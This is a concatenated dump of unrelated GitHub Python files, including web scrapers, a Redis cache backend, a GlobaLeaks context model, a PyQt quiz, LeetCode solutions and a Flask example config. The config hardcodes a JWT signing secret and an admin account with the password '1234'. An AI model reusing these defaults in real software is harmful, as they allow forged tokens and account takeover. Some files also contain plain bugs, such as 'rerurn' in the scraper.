\"a+\")\r\n\tf.write(result_str)\r\n\tf.write(\"\\n\")\r\n\tf.close()\r\n\t\r\ndef init_result():\r\n\tresult = {\"keyword_match\":False , \"tag_match\":False , \"headline\" : \"\" , \"author\" : \"\"}\r\n\treturn result\r\n\r\ndef get_keywords():\r\n\tk = open(config.keywords , \"r\")\r\n\tkeywords = []\r\n\tfor line in k:\r\n\t\tt = line.strip()\r\n\t\tif len(t) > 0:\r\n\t\t\tkeywords.append(\" \"+ t +\" \")\r\n\tk.close()\r\n\treturn keywords\r\n\r\ndef init_document():\r\n\tpattern = \"%B-%d-%Y\"\r\n\tdocument = {}\r\n\tdate_as_string = datetime.datetime.now().strftime(pattern)\r\n\tdate_as_epoch = int(time.time())\r\n\tdocument[\"_id\"] = date_as_epoch\r\n\tdocument[\"date_as_string\"] = date_as_string\r\n\treturn document\r\n\t\r\ndef init_logging():\r\n\tlogging.basicConfig(level=logging.DEBUG,\r\n filename=config.error_file,\r\n filemode='w')\r\n\tlogging.getLogger().setLevel(logging.ERROR)\r\n# main\r\ndef main():\r\n\tkeywords = get_keywords()\r\n\tdocument = init_document()\r\n\tinit_logging()\r\n\t#initialize database\r\n\ttry:\r\n\t\tclient = MongoClient()\r\n\t\tdb = client[\"news_scraper\"]\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"Mongd exception\")\t\r\n\tif len(sys.argv) > 1 :\r\n\t\tmode = sys.argv[1].strip()\r\n\t\tif mode == \"test\":\r\n\t\t\tlogging.getLogger().setLevel(logging.INFO)\r\n\t\t\tconfig.mode = \"test\"\r\n\t\t\tif sys.argv[2] == \"skip\":\r\n\t\t\t\tconfig.url_visited_check = False\r\n\t\t\tif len(sys.argv) > 3 and sys.argv[3] is not None and sys.argv[3] == \"-f\":\r\n\t\t\t\trUrl = sys.argv[4].strip()\r\n\t\t\t\to = urlparse(rUrl)\r\n\t\t\t\tlist = []\r\n\t\t\t\tsearchUrl(rUrl, 3, keywords, o.netloc , list , document , db)\r\n\t\t\t\tprint(document)\r\n\t\t\t\treturn\r\n\r\n\tcurtime = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\r\n\r\n\topen(config.result_file , \"w\").close()\r\n\tlog_result(curtime)\r\n\t# initialize the document that needs to be written to the database\r\n\tdocument = init_document()\r\n\tf = open(config.websites , \"r\")\r\n\tfor line in f:\r\n\t\tprint(\"Processing \" + line + \"\\n\")\r\n\t\trUrl = line.strip()\r\n\t\to = urlparse(rUrl)\r\n\t\tlist = []\r\n\t\tsearchUrl(rUrl, 2, keywords, o.netloc , list , document , db)\r\n\tf.close()\r\n\tcurtime = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\r\n\tlog_result(curtime)\r\n\tprint(document)\r\n\tsave_result(document , db)\r\n\t#client.close()\r\n\r\ndef save_result(document , db):\r\n\t#Write the document to mongo db.\r\n\ttry:\r\n\t\tcollection = db[\"scraping_result\"]\r\n\t\tcollection.replace_one({\"_id\":document[\"_id\"]} , document, upsert=True)\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\r\ndef is_url_visited(url , db):\r\n\tres = False\r\n\tif config.url_visited_check == False:\r\n\t\treturn False\r\n\ttry:\r\n\t\tcollection = db[\"visited_url\"]\r\n\t\tif collection.find_one({\"_id\":url}) is not None:\r\n\t\t\tres = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\t\r\n\treturn res\r\n\r\ndef mark_url_visited(url , db):\r\n\tif config.url_visited_check == False:\r\n\t\trerurn\r\n\ttry:\r\n\t\tcollection = db[\"visited_url\"]\r\n\t\tcollection.insert_one({\"_id\":url} , {\"visited\":\"True\"})\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\r\nmain()\r\n","repo_name":"dashsant/scrapper","sub_path":"app/python/web_search3.py","file_name":"web_search3.py","file_ext":"py","file_size_in_byte":25568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44158266598","text":"def main():\n op = 1\n while (op != 4):\n print(\"File Handling\\n\")\n op = int(input(\"Select an option:\\n1)Create file\\n2)Read file\\n3)Append to file\\n4)Exit\\n\"))\n if (op == 1):\n name = input(\"Enter the name of the file: \")\n name += \".txt\"\n msg = input(\"Enter the message: \")\n createFile(name, msg)\n elif (op == 2):\n name = input(\"Enter the name of the file: \")\n name += \".txt\"\n readFile(name)\n elif (op == 3):\n name = input(\"Enter the name of the file: \")\n name += \".txt\"\n msg = input(\"Message to append to file: \")\n appendFile(name, msg)\n exit()\n\n\ndef createFile(name, msg):\n f = open(name, \"w\")\n if f.write(msg + \"\\n\"):\n print(\"File written successfully!\")\n closeFile(f)\n #We can do the same like this:\n \"\"\"\n with open(name, \"w\") as file:\n file.write(\"Something\")\n \n !!Without calling close()\n \"\"\"\n\n\ndef readFile(name):\n f = open(name) # 'r' is the default processing mode\n for line in f.readlines():\n print(line, end='')\n print()\n # print(f.read())\n closeFile(f)\n\n\ndef appendFile(name, msg):\n f = open(name, \"a\")\n f.write(msg)\n closeFile(f)\n\n\ndef closeFile(f):\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JorgeCastillo97/Python","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"962744312","text":"#dksgfsjfgksf\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget,QPushButton, QLabel, QVBoxLayout, QHBoxLayout, QRadioButton, QMessageBox\nfrom random import randint\n \ndef show_win():\n victory_win = QMessageBox()\n victory_win.setWindowTitle('Викторина')\n victory_win.setText('Верно!')\n victory_win.exec_()\n \n \ndef show_lose():\n lose_win = QMessageBox()\n lose_win.setWindowTitle('Викторина')\n lose_win.setText('Попробуйте еще раз!')\n lose_win.exec_()\n \n \n \napp = QApplication([])\nmain_win = QWidget()\nmain_win.setWindowTitle('Викторина')\nmain_win.resize(500, 200)\nquestion = QLabel('В каком году была основана алгоритмика?')\nbtn_ans1 = QRadioButton('2010')\nbtn_ans2 = QRadioButton('2013')\nbtn_ans3 = QRadioButton('2016')\nbtn_ans4 = QRadioButton('2019')\n \n \nlayoutH1 = QHBoxLayout()\nlayoutH2 = QHBoxLayout()\nlayoutH3 = QHBoxLayout()\nlayout_main = QVBoxLayout()\n \nlayoutH1.addWidget(question, alignment=Qt.AlignCenter)\nlayoutH2.addWidget(btn_ans1, alignment=Qt.AlignCenter)\nlayoutH2.addWidget(btn_ans2, alignment=Qt.AlignCenter)\nlayoutH3.addWidget(btn_ans3, alignment=Qt.AlignCenter)\nlayoutH3.addWidget(btn_ans4, alignment=Qt.AlignCenter)\n \nlayout_main.addLayout(layoutH1)\nlayout_main.addLayout(layoutH2)\nlayout_main.addLayout(layoutH3)\n \nmain_win.setLayout(layout_main)\n \n \nbtn_ans3.clicked.connect(show_win)\nbtn_ans1.clicked.connect(show_lose)\nbtn_ans2.clicked.connect(show_lose)\nbtn_ans4.clicked.connect(show_lose)\nmain_win.show()\napp.exec_()\n","repo_name":"CEPblU1080/heartcheck1","sub_path":"victpy.py","file_name":"victpy.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73909471848","text":"#!venv/bin python3\n# -*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport csv\n\nbaseUrl = 'https://www.pio.gov.cy/coronavirus/categories/press'\nhtml = urlopen(baseUrl).read()\nhtml = html.decode('utf-8')\n\nsoup = BeautifulSoup(html, features='html.parser')\npdfs = soup.find_all(\"a\", {\"class\": \"flag pdf\"})\n\nwith open('data.csv', 'w', newline='') as csvfile:\n\tcsvwriter = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)\n\tfor pdf in pdfs[:10]:\n\t\thref = pdf[\"href\"]\n\t\tif \"stay\" in href or \"rapid\" in href:\n\t\t\tcsvwriter.writerow([href, pdf.text])\n\nwith open('latest.html', 'w') as f:\n\tfor pdf in pdfs[:10]:\n\t\thref = pdf[\"href\"]\n\t\tif \"stay\" in href or \"rapid\" in href:\n\t\t\tf.writelines(str(pdf))\n\t\t\tf.writelines(\"


    \")\n\n","repo_name":"kapiosk/CovidPIO","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28353257746","text":"import time\nimport json\n\nfrom redis import Redis\nfrom redis.exceptions import ConnectionError\n\nfrom .cache_dao import CacheDAO\n\n\nclass RedisBackend(CacheDAO):\n\n def __init__(self, redis1: Redis, redis2: Redis):\n self.redis1 = redis1\n self.redis2 = redis2\n\n @staticmethod\n def __test_dabase(redis: Redis):\n \"\"\"Test database\"\"\"\n if redis is None:\n return False\n try:\n redis.get(\"last_updated\")\n return True\n except ConnectionError:\n return False\n\n @staticmethod\n def __get_last_updated(redis: Redis):\n \"\"\"Get the last time the redis was updated\"\"\"\n temp = redis.get(\"last_updated\")\n return float(temp.decode()) if temp else 0\n\n def active_database(self):\n \"\"\"Get the active database\"\"\"\n redis_test_1 = self.__test_dabase(self.redis1)\n redis_test_2 = self.__test_dabase(self.redis2)\n if redis_test_1 and redis_test_2:\n temp1 = self.__get_last_updated(self.redis1)\n temp2 = self.__get_last_updated(self.redis2)\n\n if temp1 >= temp2:\n return self.redis1\n else:\n return self.redis2\n elif redis_test_1:\n return self.redis1\n elif redis_test_2:\n return self.redis2\n\n def inactive_database(self):\n \"\"\"Get the inactive database\"\"\"\n active_database = self.active_database()\n\n if active_database == self.redis2 and self.__test_dabase(self.redis1):\n return self.redis1\n elif active_database == self.redis1 and self.__test_dabase(self.redis2):\n return self.redis2\n else:\n return active_database\n\n def save(self, perms: dict):\n \"\"\"Save perms on cache\"\"\"\n\n redis = self.inactive_database()\n\n # Clean database\n redis.flushdb()\n\n redis.hmset(\"perms\", {\n hostname: json.dumps(keys)\n for hostname, keys in perms.items()\n })\n\n # Changement de redis\n redis.set(\"last_updated\", time.time())\n\n def get_perms(self, hostname: str=None):\n if hostname is None:\n return self.active_database().hgetall(\"perms\")\n else:\n return self.active_database().hget(\"perms\", hostname)","repo_name":"Valdimus/aSSHes","sub_path":"ssh/core/cache_daos/redis_dao.py","file_name":"redis_dao.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5455676355","text":"# -*- coding: UTF-8\n#\n# models/context\n# **************\n# \n# Implementation of the Storm DB side of context table and ORM\n\nfrom storm.exceptions import NotOneError\nfrom storm.twisted.transact import transact\n\nfrom storm.locals import Int, Pickle\nfrom storm.locals import Unicode, Bool, Date\nfrom storm.locals import Reference\n\nfrom globaleaks.utils import gltime, idops, log\nfrom globaleaks.models.base import TXModel\nfrom globaleaks.rest.errors import ContextGusNotFound, InvalidInputFormat\n\n__all__ = [ 'Context' ]\n\n\nclass Context(TXModel):\n from globaleaks.models.node import Node\n\n __storm_table__ = 'contexts'\n\n context_gus = Unicode(primary=True)\n\n node_id = Int()\n node = Reference(node_id, Node.id)\n\n name = Unicode()\n description = Unicode()\n fields = Pickle()\n\n languages_supported = Pickle()\n\n selectable_receiver = Bool()\n escalation_threshold = Int()\n\n creation_date = Date()\n update_date = Date()\n last_activity = Date()\n\n tip_max_access = Int()\n tip_timetolive = Int()\n file_max_download = Int()\n\n # list of receiver_gus\n receivers = Pickle()\n\n # to be implemented in REST / dict\n notification_profiles = Pickle()\n delivery_profiles = Pickle()\n inputfilter_chain = Pickle()\n # to be implemented in REST / dict\n\n # public stats reference\n # private stats reference\n\n @transact\n def new(self, context_dict):\n \"\"\"\n @param context_dict: a dictionary containing the expected field of a context,\n is called and define as contextDescriptionDict\n @return: context_gus, the universally unique identifier of the context\n \"\"\"\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context new\", context_dict)\n\n store = self.getStore('context new')\n\n cntx = Context()\n\n cntx.context_gus = idops.random_context_gus()\n cntx.node_id = 1\n\n cntx.creation_date = gltime.utcDateNow()\n cntx.update_date = gltime.utcDateNow()\n cntx.last_activity = gltime.utcDateNow()\n cntx.receivers = []\n\n try:\n cntx._import_dict(context_dict)\n except KeyError:\n store.rollback()\n store.close()\n raise InvalidInputFormat(\"Import failed near the Storm\")\n\n store.add(cntx)\n log.msg(\"Created context %s at the %s\" % (cntx.name, cntx.creation_date) )\n store.commit()\n store.close()\n\n # return context_dict\n return cntx.context_gus\n\n @transact\n def update(self, context_gus, context_dict):\n \"\"\"\n @param context_gus: the universal unique identifier\n @param context_dict: the information fields that need to be update, here is\n supported to be already validated, sanitized and logically verified\n by handlers\n @return: None or Exception on error\n \"\"\"\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context update of\", context_gus)\n store = self.getStore('context update')\n\n try:\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n except NotOneError:\n store.close()\n raise ContextGusNotFound\n if requested_c is None:\n store.close()\n raise ContextGusNotFound\n\n try:\n requested_c._import_dict(context_dict)\n except KeyError:\n store.rollback()\n store.close()\n raise InvalidInputFormat(\"Import failed near the Storm\")\n\n requested_c.update_date = gltime.utcDateNow()\n\n store.commit()\n log.msg(\"Updated context %s in %s, created in %s\" %\n (requested_c.name, requested_c.update_date, requested_c.creation_date) )\n\n store.close()\n\n @transact\n def delete_context(self, context_gus):\n \"\"\"\n @param context_gus: the universal unique identifier of the context\n @return: None if is deleted correctly, or raise an exception if something is wrong.\n \"\"\"\n from globaleaks.models.receiver import Receiver\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context delete of\", context_gus)\n\n # first, perform existence checks, this would avoid continuous try/except here\n if not self.exists(context_gus):\n raise ContextGusNotFound\n\n # delete all the reference to the context in the receivers\n receiver_iface = Receiver()\n\n # this is not a yield because getStore is not yet called!\n unlinked_receivers = receiver_iface.unlink_context(context_gus)\n\n # TODO - delete all the tips associated with the context\n # TODO - delete all the jobs associated with the context\n # TODO - delete all the stats associated with the context\n # TODO - align all the receivers present in self.receivers\n\n store = self.getStore('context delete')\n\n try:\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n except NotOneError:\n store.close()\n raise ContextGusNotFound\n if requested_c is None:\n store.close()\n raise ContextGusNotFound\n\n store.remove(requested_c)\n store.commit()\n store.close()\n\n log.msg(\"Deleted context %s, created in %s used by %d receivers\" %\n (requested_c.name, requested_c.creation_date, unlinked_receivers) )\n\n\n @transact\n def admin_get_single(self, context_gus):\n \"\"\"\n @param context_gus: UUID of the contexts\n @return: the contextDescriptionDict requested, or an exception if do not exists\n \"\"\"\n store = self.getStore('context admin_get_single')\n\n try:\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n except NotOneError:\n store.close()\n raise ContextGusNotFound\n if requested_c is None:\n store.close()\n raise ContextGusNotFound\n\n ret_context_dict = requested_c._description_dict()\n\n store.close()\n return ret_context_dict\n\n @transact\n def admin_get_all(self):\n \"\"\"\n @return: an array containing all contextDescriptionDict\n \"\"\"\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context admin_get_all\")\n\n store = self.getStore('context admin_get_all')\n\n result = store.find(Context)\n\n ret_contexts_dicts = []\n for requested_c in result:\n ret_contexts_dicts.append( requested_c._description_dict() )\n\n store.close()\n return ret_contexts_dicts\n\n @transact\n def public_get_single(self, context_gus):\n \"\"\"\n @param context_gus: requested context\n @return: context dict, stripped of the 'reserved' info\n \"\"\"\n store = self.getStore('context public_get_single')\n\n try:\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n except NotOneError:\n store.close()\n raise ContextGusNotFound\n if requested_c is None:\n store.close()\n raise ContextGusNotFound\n\n ret_context_dict = requested_c._description_dict()\n # remove the keys private in the public diplay of node informations\n ret_context_dict.pop('tip_max_access')\n ret_context_dict.pop('tip_timetolive')\n ret_context_dict.pop('file_max_download')\n ret_context_dict.pop('escalation_threshold')\n\n store.close()\n return ret_context_dict\n\n @transact\n def public_get_all(self):\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context public_get_all\")\n\n store = self.getStore('context public_get_all')\n\n ret_contexts_dicts = []\n result = store.find(Context)\n # also \"None\" is fine: simply is returned an empty array\n\n for requested_c in result:\n\n description_dict = requested_c._description_dict()\n # remove the keys private in the public diplay of node informations\n description_dict.pop('tip_max_access')\n description_dict.pop('tip_timetolive')\n description_dict.pop('file_max_download')\n description_dict.pop('escalation_threshold')\n\n ret_contexts_dicts.append(description_dict)\n\n store.close()\n return ret_contexts_dicts\n\n @transact\n def count(self):\n \"\"\"\n @return: the number of contexts. Not used at the moment\n \"\"\"\n store = self.getStore('context count')\n contextnum = store.find(Context).count()\n store.close()\n return contextnum\n\n # called always by transact method, from models\n def exists(self, context_gus):\n \"\"\"\n @param context_gus: check if the requested context exists or not\n @return: True if exist, False if not, do not raise exception.\n \"\"\"\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context exists ?\", context_gus)\n\n store = self.getStore('context exist')\n\n try:\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n\n if requested_c is None:\n retval = False\n else:\n retval = True\n\n except NotOneError:\n retval = False\n\n store.close()\n return retval\n\n @transact\n def update_languages(self, context_gus):\n\n log.debug(\"[D] %s %s \" % (__file__, __name__), \"update_languages \", context_gus)\n\n language_list = []\n\n # for each receiver check every languages supported, if not\n # present in the context declared language, append on it\n for rcvr in self.get_receivers('internal', context_gus):\n for language in rcvr.get('know_languages'):\n if not language in language_list:\n language_list.append(language)\n\n store = self.getStore('context update_languages')\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n log.debug(\"[L] before language update, context\", context_gus, \"was\", requested_c.languages_supported, \"and after got\", language_list)\n\n requested_c.languages_supported = language_list\n requested_c.update_date = gltime.utcDateNow()\n\n store.commit()\n store.close()\n\n # this is called internally by a @transact functions\n def get_receivers(self, info_type, context_gus=None):\n \"\"\"\n @param context_gus: target context to be searched between receivers, if not specified,\n the receivers returned are searched in 'self'\n @info_type: its a string with three possible values:\n 'public': get the information represented to the WB and in public\n 'internal': a series of data used by internal calls\n 'admin': complete dump of the information, wrap Receiver._description_dict\n @return: a list, 0 to MANY receiverDict tuned for the caller requirements\n \"\"\"\n from globaleaks.models.receiver import Receiver\n\n typology = [ 'public', 'internal', 'admin' ]\n\n if not info_type in typology:\n log.debug(\"[Fatal]\", info_type, \"not found in\", typology)\n raise NotImplementedError\n\n store = self.getStore('context get_receivers')\n\n # I've made some experiment with https://storm.canonical.com/Manual#IN (in vain)\n # the goal is search which context_gus is present in the Receiver.contexts\n # and then work in the selected Receiver.\n\n\n if context_gus:\n workinobj = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n else:\n workinobj = self\n\n # Hi. I'm a really DIRTY HACK.\n # :)\n # Hi. I'm a really DIRTY HACK.\n # :)\n\n receiver_list = workinobj.receivers\n #store.close()\n #return receiver_list\n\n all_r = store.find(Receiver)\n for r in all_r:\n\n partial_info = {}\n\n if info_type == typology[0]: # public\n partial_info.update({'receiver_gus' : r.receiver_gus })\n partial_info.update({'name': r.name })\n partial_info.update({'description': r.description })\n if info_type == typology[1]: # internal\n partial_info.update({'receiver_gus' : r.receiver_gus })\n partial_info.update({'know_languages' : r.know_languages })\n if info_type == typology[2]: # admin\n partial_info = r._description_dict()\n\n receiver_list.append(partial_info)\n\n # GoodBye. I'm a really DIRTY HACK.\n # :)\n # GoodBye. I'm a really DIRTY HACK.\n # :)\n\n store.close()\n return receiver_list\n\n\n @transact\n def full_context_align(self, receiver_gus, un_context_selected):\n \"\"\"\n Called by Receiver handlers (PUT|POST), roll in all the context and delete|add|skip\n with the presence of receiver_gus\n \"\"\"\n store = self.getStore('full_context_align')\n\n context_selected = []\n for c in un_context_selected:\n context_selected.append(str(c))\n\n presents_context = store.find(Context)\n\n debug_counter = 0\n for c in presents_context:\n\n # if is not present in context.receivers and is requested: add\n if c.receivers and not receiver_gus in c.receivers:\n if c.context_gus in context_selected:\n debug_counter += 1\n c.receivers.append(str(receiver_gus))\n\n # if is present in receiver.contexts and is not selected: remove\n if c.receivers and (receiver_gus in c.receivers):\n if not c.context_gus in context_selected:\n debug_counter += 1\n c.receivers.remove(str(receiver_gus))\n\n log.debug(\" %%%% full_context_align in all contexts after %s has been set with %s: %d mods\" %\n ( receiver_gus, str(context_selected), debug_counter ) )\n\n store.commit()\n store.close()\n\n\n @transact\n def context_align(self, context_gus, receiver_selected):\n \"\"\"\n Called by Context handler, (PUT|POST), just take the context and update the\n associated receivers\n \"\"\"\n store = self.getStore('context_align')\n\n try:\n requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n except NotOneError:\n store.close()\n raise ContextGusNotFound\n if requested_c is None:\n store.close()\n raise ContextGusNotFound\n\n requested_c.receivers = []\n for r in receiver_selected:\n requested_c.receivers.append(str(r))\n\n log.debug(\" ++++ context_align in receiver %s with receivers %s\" %\n ( context_gus, str(receiver_selected) ) )\n\n store.commit()\n store.close()\n\n # This is not a transact method, is used internally by this class to assembly\n # response dict. This method return all the information of a context, the\n # called using .pop() should remove the 'confidential' value, if any\n def _description_dict(self):\n\n description_dict = {\n \"context_gus\": self.context_gus,\n \"name\": self.name,\n \"description\": self.description,\n \"selectable_receiver\": self.selectable_receiver,\n \"languages\": self.languages_supported if self.languages_supported else [],\n 'tip_max_access' : self.tip_max_access,\n 'tip_timetolive' : self.tip_timetolive,\n 'file_max_download' : self.file_max_download,\n 'escalation_threshold' : self.escalation_threshold,\n 'fields': self.fields,\n 'receivers' : self.receivers if self.receivers else []\n\n }\n # receivers is added\n\n return description_dict\n\n # this method import the remote received dict.\n # would be expanded with defaults value (if configured) and with checks about\n # expected fields. is called by new() and update()\n\n def _import_dict(self, context_dict):\n\n self.name = context_dict['name']\n self.fields = context_dict['fields']\n self.description = context_dict['description']\n self.selectable_receiver = context_dict['selectable_receiver']\n self.escalation_threshold = context_dict['escalation_threshold']\n self.tip_max_access = context_dict['tip_max_access']\n self.tip_timetolive = context_dict['tip_timetolive']\n self.file_max_download = context_dict['file_max_download']\n\n if self.selectable_receiver and self.escalation_threshold:\n log.msg(\"[!] Selectable receiver feature and escalation threshold can't work both: threshold ignored\")\n self.escalation_threshold = 0\n\n","repo_name":"Afridocs/GLBackend","sub_path":"globaleaks/models/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39162858654","text":"from typing import List\n\n\nclass Solution:\n def gardenNoAdj(self, n: int, paths: List[List[int]]) -> List[int]:\n \"\"\"\n 思路清晰: 先建图 再染色, 但染色过程有误\n 问题在于:在遍历过程中对目标点进行染色存在一定的问题,例如无法准确识别出目标顶点染色1号的情况\n 实际上,对于这类染色问题,应当从自身染色出发,一步步迭代进行,具体参见 advanced 函数\n :param n:\n :param paths:\n :return:\n \"\"\"\n ans = [1] * n\n map = [[] for _ in range(n)]\n for u, v in paths:\n map[u - 1].append(v - 1)\n map[v - 1].append(u - 1)\n for i in range(n):\n for j in range(len(map[i])):\n if map[i][j] > i:\n ans[map[i][j]] = max(ans[map[i][j]], ans[i] + 1)\n\n return ans\n\n def advanced(self, n: int, paths: List[List[int]]) -> List[int]:\n g = [[] for _ in range(n)]\n for u, v in paths:\n g[u - 1].append(v - 1)\n g[v - 1].append(u - 1)\n color = [0] * n\n for i, nodes in enumerate(g):\n color[i] = (set(range(1, 5)) - {color[j] for j in nodes}).pop()\n\n def Bitwise(self, n: int, paths: List[List[int]]) -> List[int]:\n g = [[] for _ in range(n)]\n for u, v in paths:\n g[u - 1].append(v - 1)\n g[v - 1].append(u - 1)\n color = [0] * n\n for i, nodes in enumerate(g):\n mask = 1\n for j in g[i]:\n mask |= 1 << color[j]\n mask = ~mask\n color[i] = (mask & -mask).bit_length() - 1\n return color\n\n\nif __name__ == '__main__':\n z, c = 4, [[1, 2], [3, 4]]\n print(1 << 0)\n so = Solution()\n print(so.Bitwise(z, c))\n","repo_name":"BiqiangWang/leetcode","sub_path":"daily/1042.py","file_name":"1042.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31297519172","text":"# rename to config.py\nfrom dataclasses import dataclass\n\n@dataclass\nclass Plan:\n name: str\n price: float\n popular: bool\n features: list[str]\n legendText: str\n\n@dataclass\nclass Page:\n route: str\n name: str\n\nclass AppPage(Page):\n accessibleBy: list[str]\n icon: str\n\n def __init__(self, route:str, name:str, accessibleBy:list[str]=['user', 'patient', 'medicalPersonnel', 'doctor', 'medicalAssistant', 'administrative'], icon:str=None):\n super().__init__(route, name)\n self.accessibleBy = accessibleBy\n if icon is not None:\n self.icon = icon\n else:\n self.icon = 'icons/home.svg'\n \nclass Config(object):\n DEBUG = False\n TESTING = False\n ENV = 'production'\n JSON_SORT_KEYS = False\n SESSION_COOKIE_SAMESITE = 'Strict'\n SECRET_KEY = 'meedikal' # used to sign and verify jwt tokens\n DATABASE = 'meedikal.db'\n UPLOAD_FOLDER = 'images/'\n Admin = {\n 'id': 12345678,\n 'name1': 'john',\n 'surname1': 'doe',\n 'sex': 'M',\n 'birthdate': '2002-10-24',\n 'location': 'Street 123',\n 'email': 'mateocarriqui7@gmail.com',\n 'password': '1234',\n 'active': 1,\n }\n \n company_name = 'Healthcare Company'\n \n central_data = {\n 'address': 'Jorge Canning 2363, Montevideo',\n 'email': 'support@hccompany.com',\n 'phone': '123-456-7890',\n 'google_maps_link': 'https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d13095.168728844454!2d-56.1938193!3d-34.8614488!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xa3c298c9fd703d35!2sSociedad%20M%C3%A9dica%20Universal!5e0!3m2!1sen!2suy!4v1633202238613!5m2!1sen!2suy'\n }\n\n role_colors = {\n 'user': 'bg-gray-300',\n 'administrative': 'bg-red-500',\n 'patient': 'bg-turqoise',\n 'medicalPersonnel': 'bg-skyblue',\n 'doctor': 'bg-darker-skyblue',\n 'medicalAssistant': 'bg-skyblue',\n }\n\n plans = [\n Plan(name='Plan 1',\n price=100,\n popular=False, \n features=['feature 1',\n 'feature 2',\n 'feature 3'],\n legendText='Initial Plan.'),\n \n Plan(name='Plan 2',\n price=190, \n popular=True,\n features=['feature 1',\n 'feature 2',\n 'feature 3',\n 'feature 4',\n 'feature 5'],\n legendText='Pro Plan.'),\n \n Plan(name='Plan 3', \n price=400, \n popular=False,\n features=['feature 1',\n 'feature 2',\n 'feature 3',\n 'feature 4',\n 'feature 5',\n 'feature 6'],\n legendText='Family Plan.'),\n \n Plan(name='Plan 4', \n price=750, \n popular=False, \n features=['feature 1',\n 'feature 2',\n 'feature 3',\n 'feature 4',\n 'feature 5',\n 'feature 6',\n 'feature 7'],\n legendText='Golden Plan.'),\n ]\n\n landing_pages = [\n Page(route='/', name='Home'), \n Page(route='/contact', name='Contact'), \n Page(route='/plans', name='Plans'),\n Page(route='/login', name='Login'),\n Page(route='/affiliate', name='Affiliate')\n ]\n\n app_pages = [\n AppPage('/app', 'Home', icon='icons/home.svg'),\n AppPage('/app/users', 'Users', ['administrative'], icon='icons/users.svg'),\n AppPage('/app/appointments', 'Appointments', icon='icons/appointments.svg'),\n AppPage('/app/patients', 'Patients', ['doctor'], icon='icons/users.svg'),\n AppPage('/app/symptoms', 'Symptoms', icon='icons/symptoms.svg'),\n AppPage('/app/diseases', 'Diseases', icon='icons/diseases.svg'),\n AppPage('/app/clinical-signs', 'Clinical Signs', icon='icons/clinical_signs.svg'),\n AppPage('/app/branches', 'Branches', icon='icons/branches.svg'),\n AppPage('/app/stats', 'Stats', ['administrative'], icon='icons/stats.svg'),\n AppPage('/app/profile', 'Profile'),\n ]\n\nclass ProductionConfig(Config):\n DEBUG = False\n\nclass StagingConfig(Config):\n DEBUG = True\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n ENV= \"development\"\n\nclass TestingConfig(Config):\n TESTING = True\n","repo_name":"system32uwu/Meedikal","sub_path":"app/config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15949955507","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('account', '0003_auto_20160311_1442'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='student',\n name='number_of_semesters',\n field=models.PositiveIntegerField(null=True, blank=True),\n ),\n ]\n","repo_name":"aakash-cr7/demo-ucp","sub_path":"account/migrations/0004_auto_20160311_1510.py","file_name":"0004_auto_20160311_1510.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158166887","text":"n, m = map(int, input().split())\r\narr = []\r\ndef recur(start):\r\n if len(arr) == m:\r\n print(*arr)\r\n return\r\n for i in range(start, n+1):\r\n arr.append(i)\r\n recur(i)\r\n arr.pop()\r\n\r\nrecur(1)","repo_name":"yooooonzzzzzang/Algo_seed","sub_path":"백준/Silver/15652. N과 M (4)/N과 M (4).py","file_name":"N과 M (4).py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24816399910","text":"from logging import FileHandler, 